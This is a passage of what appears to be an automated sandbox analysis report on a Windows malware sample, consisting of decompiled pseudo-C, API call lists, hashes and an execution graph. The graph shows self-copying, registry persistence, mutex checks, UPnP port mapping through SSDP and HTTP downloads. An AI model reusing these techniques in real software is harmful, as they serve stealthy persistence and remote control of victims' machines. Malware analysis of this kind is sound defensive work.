                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00408990(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v16;
                                                                                                                                                                                                                                                                  			}


















                                                                                                                                                                                                                                                                  0x0040c956
                                                                                                                                                                                                                                                                  0x0040c965
                                                                                                                                                                                                                                                                  0x0040c96a
                                                                                                                                                                                                                                                                  0x0040c96d
                                                                                                                                                                                                                                                                  0x0040c974
                                                                                                                                                                                                                                                                  0x0040c97e
                                                                                                                                                                                                                                                                  0x0040c983
                                                                                                                                                                                                                                                                  0x0040c986
                                                                                                                                                                                                                                                                  0x0040c98d
                                                                                                                                                                                                                                                                  0x0040c993
                                                                                                                                                                                                                                                                  0x0040c99d
                                                                                                                                                                                                                                                                  0x0040c9a6
                                                                                                                                                                                                                                                                  0x0040c9b1
                                                                                                                                                                                                                                                                  0x0040c9c1
                                                                                                                                                                                                                                                                  0x0040c9cb
                                                                                                                                                                                                                                                                  0x0040c9d4
                                                                                                                                                                                                                                                                  0x0040c9dc
                                                                                                                                                                                                                                                                  0x0040c9e8
                                                                                                                                                                                                                                                                  0x0040c9ed
                                                                                                                                                                                                                                                                  0x0040c9f0
                                                                                                                                                                                                                                                                  0x0040c9f7
                                                                                                                                                                                                                                                                  0x0040c9fd
                                                                                                                                                                                                                                                                  0x0040ca02
                                                                                                                                                                                                                                                                  0x0040ca05
                                                                                                                                                                                                                                                                  0x0040ca0c
                                                                                                                                                                                                                                                                  0x0040ca1f
                                                                                                                                                                                                                                                                  0x0040ca24
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca69
                                                                                                                                                                                                                                                                  0x0040ca6e
                                                                                                                                                                                                                                                                  0x0040ca77

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysAllocString.OLEAUT32(00000000), ref: 0040BD4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: CoCreateInstance.OLE32(0040F318,00000000,00004401,0040F308,00000000), ref: 0040BD76
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysFreeString.OLEAUT32(00000000), ref: 0040BE11
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                  • String ID: %S%S
                                                                                                                                                                                                                                                                  • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                  • Opcode ID: 2ae2762a012528179557cf2ef0acaad12bf3170ac0909533dffa7135a3e4dff9
                                                                                                                                                                                                                                                                  • Instruction ID: fa3ea7129126085e9455d64281f51dd4710db2dfe7809279c8c0483b4bb99b26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae2762a012528179557cf2ef0acaad12bf3170ac0909533dffa7135a3e4dff9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D741F8B5A00109DFCB04DBA4C885BAFB7B9AF48304F148669E505B7391D738AA45CFA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040CD40() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				char _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_t20 = E0040C2A0( &_v12,  &_v12);
                                                                                                                                                                                                                                                                  				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                  				_v8 = _t20;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_t20 = E0040C950( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                                                                                                                                                                                                  						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                  						 *0x4139dc = _t20;
                                                                                                                                                                                                                                                                  						if( *0x4139dc == 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v20 = E00409260();
                                                                                                                                                                                                                                                                  						E0040CCC0( *0x4139dc,  *0x4139dc, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t20 = E0040CCC0( *0x4139dc,  *0x4139dc, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return E00408AB0(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040cd4a
                                                                                                                                                                                                                                                                  0x0040cd50
                                                                                                                                                                                                                                                                  0x0040cd5b
                                                                                                                                                                                                                                                                  0x0040cd60
                                                                                                                                                                                                                                                                  0x0040cd63
                                                                                                                                                                                                                                                                  0x0040cd6a
                                                                                                                                                                                                                                                                  0x0040cd70
                                                                                                                                                                                                                                                                  0x0040cd82
                                                                                                                                                                                                                                                                  0x0040cd94
                                                                                                                                                                                                                                                                  0x0040cd99
                                                                                                                                                                                                                                                                  0x0040cd9c
                                                                                                                                                                                                                                                                  0x0040cda8
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x0040cdaf
                                                                                                                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                                                                                                                  0x0040cde3
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cdfc
                                                                                                                                                                                                                                                                  0x0040ce02

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040624C), ref: 0040CD4A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID: TCP$UDP
                                                                                                                                                                                                                                                                  • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                  • Opcode ID: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction ID: 59801a5b79b9a69c2d6e15e1ff1d4abc1ee1c9ac4fca949444fada01e75ea631
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C611A5B5E00108EBDB00EFD4D886BAE7775AB44308F10867EE401772C2D6786A00CF49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:21.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                  Total number of Nodes:1439
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                                                                                                                                                  execution_graph 4234 405b40 Sleep 4240 405b68 4234->4240 4235 405b76 PathFileExistsW 4239 405b85 DeleteFileW DeleteFileA MoveFileA 4235->4239 4235->4240 4236 405bbc CreateMutexA GetLastError 4237 405be6 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4236->4237 4238 405bde ExitProcess 4236->4238 4241 405c71 4237->4241 4239->4240 4240->4235 4240->4236 4242 405cfb 4241->4242 4243 405f5e Sleep RegOpenKeyExA 4241->4243 4370 40ce10 GetLocaleInfoA 4242->4370 4244 406075 RegOpenKeyExA 4243->4244 4245 405f8f 8 API calls 4243->4245 4247 406181 Sleep 4244->4247 4248 40609b 8 API calls 4244->4248 4245->4244 4290 40aee0 4247->4290 4248->4247 4251 405d10 ExpandEnvironmentStringsW wsprintfW CopyFileW 4253 405d64 SetFileAttributesW RegOpenKeyExW 4251->4253 4254 405e3d Sleep wsprintfW CopyFileW 4251->4254 4252 405d08 ExitProcess 4256 405d99 RegSetValueExW RegCloseKey 4253->4256 4257 405e1e 4253->4257 4254->4243 4259 405e85 SetFileAttributesW RegOpenKeyExW 4254->4259 4256->4257 4372 40d0b0 memset CreateProcessW 4257->4372 4258 40619c 9 API calls 4293 404320 InitializeCriticalSection CreateFileW 4258->4293 5550 404120 4258->5550 5559 4051d0 Sleep GetModuleFileNameW 4258->5559 5574 405a20 4258->5574 4262 405eba RegSetValueExW RegCloseKey 4259->4262 4263 405f3f 4259->4263 4262->4263 4267 40d0b0 5 API calls 4263->4267 4272 405f4b 4267->4272 4268 4062e9 4269 405e35 ExitProcess 4272->4243 4273 405f56 ExitProcess 4272->4273 4276 406251 CreateEventA 4325 40a610 4276->4325 4285 40b8c0 312 API calls 4286 4062b1 4285->4286 4287 40b8c0 312 API calls 4286->4287 4288 4062cd 4287->4288 4289 40b8c0 312 API calls 4288->4289 4289->4268 4378 40aeb0 4290->4378 4294 404445 4293->4294 4295 404358 CreateFileMappingW 4293->4295 4307 40cd40 CoInitializeEx 4294->4307 4296 404379 MapViewOfFile 4295->4296 4297 40443b CloseHandle 4295->4297 4298 404431 CloseHandle 4296->4298 4299 404398 GetFileSize 4296->4299 4297->4294 4298->4297 4303 4043ad 4299->4303 4300 404427 UnmapViewOfFile 4300->4298 4301 4043bc 4301->4300 4303->4300 4303->4301 4304 4043ec 4303->4304 4507 40af30 4303->4507 4514 404210 4303->4514 4305 408990 _invalid_parameter 3 API calls 4304->4305 4305->4301 4816 40c2a0 socket 4307->4816 4309 40624c 4320 4058d0 CoInitializeEx SysAllocString 4309->4320 4310 40cde8 4860 408ab0 4310->4860 4313 40cdaa 4841 409260 htons 4313->4841 4314 40cd60 4314->4309 4314->4310 4314->4313 4826 40c950 4314->4826 4319 40ccc0 24 API calls 4319->4310 4321 4058f2 4320->4321 4322 405908 CoUninitialize 4320->4322 5005 405640 4321->5005 4322->4276 5014 40a5d0 4325->5014 4328 40a5d0 3 API calls 4329 40a62e 4328->4329 4330 40a5d0 3 API calls 4329->4330 4331 40a63e 4330->4331 4332 40a5d0 3 API calls 4331->4332 4333 406269 4332->4333 4334 40b810 4333->4334 4335 408820 7 API calls 4334->4335 4336 40b81b 4335->4336 4337 406273 4336->4337 4338 40b827 InitializeCriticalSection 4336->4338 4339 409a60 InitializeCriticalSection 4337->4339 4338->4337 4344 409a7a 4339->4344 4340 409aa9 CreateFileW 4342 409ad0 CreateFileMappingW 4340->4342 4343 409b92 4340->4343 4346 409af1 MapViewOfFile 4342->4346 4347 409b88 CloseHandle 4342->4347 5057 409470 EnterCriticalSection 4343->5057 4344->4340 5021 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4344->5021 5022 409750 4344->5022 4350 409b0c GetFileSize 4346->4350 4351 409b7e CloseHandle 4346->4351 4347->4343 4349 409b97 4352 40b8c0 312 API calls 4349->4352 4356 409b2b 4350->4356 4351->4347 4354 40627d 4352->4354 4353 409b74 UnmapViewOfFile 4353->4351 4358 40b8c0 4354->4358 4356->4353 4357 409750 28 API calls 4356->4357 5060 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4356->5060 4357->4356 4359 40b8d7 EnterCriticalSection 4358->4359 4360 406296 4358->4360 5081 40b840 4359->5081 4360->4285 4363 40b99b LeaveCriticalSection 4363->4360 4364 408880 9 API calls 4365 40b919 4364->4365 4365->4363 4366 40b92b CreateThread 4365->4366 4366->4363 4367 40b94e 4366->4367 5086 409340 4366->5086 5092 40b7c0 4366->5092 5098 40b5c0 4366->5098 5104 40bcd0 4366->5104 5110 40e750 GetQueuedCompletionStatus 4366->5110 5117 40e120 GetTickCount WaitForSingleObject 4366->5117 5140 40bc30 4366->5140 4368 40b972 GetCurrentProcess GetCurrentProcess DuplicateHandle 4367->4368 4369 40b994 4367->4369 4368->4369 4369->4363 4371 405d00 4370->4371 4371->4251 4371->4252 4373 40d110 Sleep 4372->4373 4374 40d11f ShellExecuteW 4372->4374 4375 405e2a 4373->4375 4376 40d154 4374->4376 4377 40d145 Sleep 4374->4377 4375->4254 4375->4269 4376->4375 4377->4375 4381 40ae50 4378->4381 4382 40ae83 4381->4382 4383 40ae6e 4381->4383 4385 406191 4382->4385 4387 40ac80 4382->4387 4421 40ab00 4383->4421 4385->4258 4385->4268 4388 40aca9 4387->4388 4389 40ad5a 4387->4389 4416 40ad52 4388->4416 4447 408820 4388->4447 4392 408820 7 API calls 4389->4392 4389->4416 4393 40ad7e 4392->4393 4396 401000 7 API calls 4393->4396 4393->4416 4398 40ada2 4396->4398 4397 408820 7 API calls 4399 40acf2 4397->4399 4400 408820 7 API calls 4398->4400 4455 4011e0 4399->4455 4402 40adb1 4400->4402 4404 4011e0 10 API calls 4402->4404 4403 40ad1b 4458 408990 4403->4458 4406 40adda 4404->4406 4408 408990 _invalid_parameter 3 API calls 4406->4408 4410 40ade6 4408->4410 4409 401000 7 API calls 4411 40ad38 4409->4411 4412 401000 7 API calls 4410->4412 4414 4011e0 10 API calls 4411->4414 4413 40adf7 4412->4413 4415 4011e0 10 API calls 4413->4415 4414->4416 4417 40ae11 4415->4417 4416->4385 4418 401000 7 API calls 4417->4418 4419 40ae22 4418->4419 4420 4011e0 10 API calls 4419->4420 4420->4416 4422 40abb2 4421->4422 4423 40ab29 4421->4423 4425 408820 7 API calls 4422->4425 4442 40abaa 4422->4442 4424 408820 7 API calls 4423->4424 4423->4442 4426 40ab3c 4424->4426 4427 40abd8 4425->4427 4428 401000 7 API calls 4426->4428 4426->4442 4430 401000 7 API calls 4427->4430 4427->4442 4429 40ab65 4428->4429 4431 4011e0 10 API calls 4429->4431 4432 40ac05 4430->4432 4434 40ab7f 4431->4434 4433 4011e0 10 API calls 4432->4433 4435 40ac1f 4433->4435 4436 401000 7 API calls 4434->4436 4437 401000 7 API calls 4435->4437 4438 40ab90 4436->4438 4439 40ac30 4437->4439 4440 4011e0 10 API calls 4438->4440 4441 4011e0 10 API calls 4439->4441 4440->4442 4443 40ac4a 4441->4443 4442->4385 4444 401000 7 API calls 4443->4444 4445 40ac5b 4444->4445 4446 4011e0 10 API calls 4445->4446 4446->4442 4465 408780 4447->4465 4450 401000 4486 408840 4450->4486 4493 4010c0 4455->4493 4457 4011ff _invalid_parameter 4457->4403 4503 408570 GetCurrentProcessId 4458->4503 4460 40899b 4461 4089a2 4460->4461 4504 408590 4460->4504 4461->4409 4464 4089b7 RtlFreeHeap 4464->4461 4474 408570 GetCurrentProcessId 4465->4474 4467 40878b 4469 408797 _invalid_parameter 4467->4469 4475 4086e0 4467->4475 4470 40880c 4469->4470 4471 4087b2 RtlAllocateHeap 4469->4471 4470->4416 4470->4450 4471->4470 4472 4087d9 _invalid_parameter 4471->4472 4472->4470 4473 4087f4 memset 4472->4473 4473->4470 4474->4467 4483 408570 GetCurrentProcessId 4475->4483 4477 4086e9 4478 408706 HeapCreate 4477->4478 4484 408650 GetProcessHeaps 4477->4484 4480 408720 HeapSetInformation GetCurrentProcessId 4478->4480 4481 408747 4478->4481 4480->4481 4481->4469 4483->4477 4485 408681 4484->4485 4485->4478 4485->4481 4487 408780 _invalid_parameter 7 API calls 4486->4487 4488 40100b 4487->4488 4489 401400 4488->4489 4490 40140a 4489->4490 4491 408840 _invalid_parameter 7 API calls 4490->4491 4492 401018 4491->4492 4492->4397 4494 40110e 4493->4494 4495 4010d1 4493->4495 4494->4495 4496 408840 _invalid_parameter 7 API calls 4494->4496 4495->4457 4499 401132 _invalid_parameter 4496->4499 4497 401162 memcpy 4498 401186 _invalid_parameter 4497->4498 4501 408990 _invalid_parameter 3 API calls 4498->4501 4499->4497 4500 408990 _invalid_parameter 3 API calls 4499->4500 4502 40115f 4500->4502 4501->4495 4502->4497 4503->4460 4505 4085c0 HeapValidate 4504->4505 4506 4085e0 4504->4506 4505->4506 4506->4461 4506->4464 4523 408a00 4507->4523 4510 40af71 4510->4303 4513 408990 _invalid_parameter 3 API calls 4513->4510 4731 408880 4514->4731 4517 404301 4517->4303 4518 408a00 8 API calls 4519 40427b 4518->4519 4741 40a8a0 4519->4741 4527 408a2d 4523->4527 4524 408840 _invalid_parameter 7 API calls 4524->4527 4525 408a42 4525->4510 4528 40a440 4525->4528 4526 408a44 memcpy 4526->4527 4527->4524 4527->4525 4527->4526 4531 40a44c 4528->4531 4532 40a4a8 4531->4532 4534 408990 _invalid_parameter 3 API calls 4531->4534 4535 40a46b 4531->4535 4536 40a990 4531->4536 4550 406300 4531->4550 4533 408990 _invalid_parameter 3 API calls 4532->4533 4533->4535 4534->4531 4535->4510 4535->4513 4538 40a99f _invalid_parameter 4536->4538 4537 40a9a9 4537->4531 4538->4537 4539 408840 _invalid_parameter 7 API calls 4538->4539 4540 40aa38 4539->4540 4540->4537 4541 401000 7 API calls 4540->4541 4542 40aa4d 4541->4542 4543 401000 7 API calls 4542->4543 4544 40aa55 4543->4544 4546 40aaad _invalid_parameter 4544->4546 4553 40a930 4544->4553 4558 401050 4546->4558 4549 401050 3 API calls 4549->4537 4666 4084f0 4550->4666 4554 4011e0 10 API calls 4553->4554 4555 40a944 4554->4555 4564 4013e0 4555->4564 4557 40a95c 4557->4544 4559 4010ae 4558->4559 4562 401064 _invalid_parameter 4558->4562 4559->4549 4560 40108c 4561 408990 _invalid_parameter 3 API calls 4560->4561 4561->4559 4562->4560 4563 408990 _invalid_parameter 3 API calls 4562->4563 4563->4560 4567 4012d0 4564->4567 4566 4013fa 4566->4557 4568 4012e4 4567->4568 4569 4010c0 __aligned_recalloc_base 10 API calls 4568->4569 4570 40132d 4569->4570 4571 4010c0 __aligned_recalloc_base 10 API calls 4570->4571 4572 40133d 4571->4572 4573 4010c0 __aligned_recalloc_base 10 API calls 4572->4573 4574 40134d 4573->4574 4575 4010c0 __aligned_recalloc_base 10 API calls 4574->4575 4576 40135d 4575->4576 4577 401366 4576->4577 4578 40138f 4576->4578 4582 402c20 4577->4582 4599 4029d0 4578->4599 4581 401387 _invalid_parameter 4581->4566 4583 401400 _invalid_parameter 7 API calls 4582->4583 4584 402c37 4583->4584 4585 401400 _invalid_parameter 7 API calls 4584->4585 4586 402c46 4585->4586 4587 401400 _invalid_parameter 7 API calls 4586->4587 4588 402c55 4587->4588 4589 401400 _invalid_parameter 7 API calls 4588->4589 4590 402c64 _invalid_parameter 4589->4590 4592 402e0f _invalid_parameter 4590->4592 4602 401430 4590->4602 4593 401430 _invalid_parameter 3 API calls 4592->4593 4594 402e35 _invalid_parameter 4592->4594 4593->4592 4595 401430 _invalid_parameter 3 API calls 4594->4595 4596 402e5b _invalid_parameter 4594->4596 4595->4594 4597 401430 _invalid_parameter 3 API calls 4596->4597 4598 402e81 4596->4598 4597->4596 4598->4581 4606 402e90 4599->4606 4601 4029ec 4601->4581 4603 401446 4602->4603 4604 40143b 4602->4604 4603->4590 4605 408990 _invalid_parameter 3 API calls 4604->4605 4605->4603 4607 402ea6 _invalid_parameter 4606->4607 4608 402edd 4607->4608 4610 402eb8 _invalid_parameter 4607->4610 4611 402f03 4607->4611 4636 402880 4608->4636 4610->4601 4612 402f3d 4611->4612 4613 402f5e 4611->4613 4646 402a00 4612->4646 4615 401400 _invalid_parameter 7 API calls 4613->4615 4616 402f6f 4615->4616 4617 401400 _invalid_parameter 7 API calls 4616->4617 4618 402f7e 4617->4618 4619 401400 _invalid_parameter 7 API calls 4618->4619 4620 402f8d 4619->4620 4621 401400 _invalid_parameter 7 API calls 4620->4621 4622 402f9c 4621->4622 4659 402950 4622->4659 4624 401400 _invalid_parameter 7 API calls 4625 402fca _invalid_parameter 4624->4625 4625->4624 4627 403084 _invalid_parameter 4625->4627 4626 401430 _invalid_parameter 3 API calls 4626->4627 4627->4626 4628 4033a3 _invalid_parameter 4627->4628 4629 401430 _invalid_parameter 3 API calls 4628->4629 4630 4033c9 _invalid_parameter 4628->4630 4629->4628 4631 401430 _invalid_parameter 3 API calls 4630->4631 4632 4033ef _invalid_parameter 4630->4632 4631->4630 4633 401430 _invalid_parameter 3 API calls 4632->4633 4634 403415 _invalid_parameter 4632->4634 4633->4632 4634->4610 4635 401430 _invalid_parameter 3 API calls 4634->4635 4635->4634 4637 40288e 4636->4637 4638 401400 _invalid_parameter 7 API calls 4637->4638 4639 4028ab 4638->4639 4640 401400 _invalid_parameter 7 API calls 4639->4640 4641 4028ba _invalid_parameter 4640->4641 4642 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4641->4642 4643 40291a _invalid_parameter 4641->4643 4642->4641 4644 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4643->4644 4645 402940 4643->4645 4644->4643 4645->4610 4647 401400 _invalid_parameter 7 API calls 4646->4647 4648 402a17 4647->4648 4649 401400 _invalid_parameter 7 API calls 4648->4649 4650 402a26 4649->4650 4651 401400 _invalid_parameter 7 API calls 4650->4651 4658 402a35 _invalid_parameter 4651->4658 4652 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4652->4658 4653 402bc1 _invalid_parameter 4654 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4653->4654 4655 402be7 _invalid_parameter 4653->4655 4654->4653 4656 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4655->4656 4657 402c0d 4655->4657 4656->4655 4657->4610 4658->4652 4658->4653 4660 401400 _invalid_parameter 7 API calls 4659->4660 4661 40295f _invalid_parameter 4660->4661 4662 402880 _invalid_parameter 9 API calls 4661->4662 4663 402998 _invalid_parameter 4662->4663 4664 401430 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4663->4664 4665 4029c3 4663->4665 4664->4663 4665->4625 4667 408502 4666->4667 4670 408450 4667->4670 4671 408840 _invalid_parameter 7 API calls 4670->4671 4673 408460 4671->4673 4676 40849c 4673->4676 4677 40631f 4673->4677 4679 407990 4673->4679 4686 407f70 4673->4686 4691 408340 4673->4691 4675 408990 _invalid_parameter 3 API calls 4675->4677 4676->4675 4677->4531 4680 407999 4679->4680 4681 4079a3 4679->4681 4680->4673 4681->4680 4682 4079e6 memset 4681->4682 4682->4680 4683 407a07 4682->4683 4683->4680 4684 407a0d memcpy 4683->4684 4699 407760 4684->4699 4687 407f87 4686->4687 4690 407f7d 4686->4690 4688 40807f memcpy 4687->4688 4687->4690 4704 407cb0 4687->4704 4688->4687 4690->4673 4694 408356 4691->4694 4697 40834c 4691->4697 4692 407cb0 57 API calls 4693 4083d7 4692->4693 4695 407760 6 API calls 4693->4695 4693->4697 4694->4692 4694->4697 4696 4083f6 4695->4696 4696->4697 4698 40840b memcpy 4696->4698 4697->4673 4698->4697 4700 4077ae 4699->4700 4701 40776e 4699->4701 4700->4680 4701->4700 4703 4076a0 6 API calls 4701->4703 4703->4701 4705 407ccb 4704->4705 4707 407cc1 4704->4707 4705->4707 4710 407af0 4705->4710 4707->4687 4709 407cb0 57 API calls 4709->4707 4711 407afd 4710->4711 4712 407b07 4710->4712 4711->4707 4711->4709 4712->4711 4713 407b90 4712->4713 4715 407b95 4712->4715 4716 407b78 4712->4716 4721 407450 4713->4721 4719 407760 6 API calls 4715->4719 4718 407760 6 API calls 4716->4718 4718->4713 4719->4713 4720 407c3c memset 4720->4711 4722 407469 4721->4722 4730 40745f 4721->4730 4723 407330 6 API calls 4722->4723 4722->4730 4724 407562 4723->4724 4725 408840 _invalid_parameter 7 API calls 4724->4725 4726 4075b1 4725->4726 4727 4071b0 44 API calls 4726->4727 4726->4730 4728 4075de 4727->4728 4729 408990 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4728->4729 4729->4730 4730->4711 4730->4720 4750 408570 GetCurrentProcessId 4731->4750 4733 40888b 4734 4086e0 _invalid_parameter 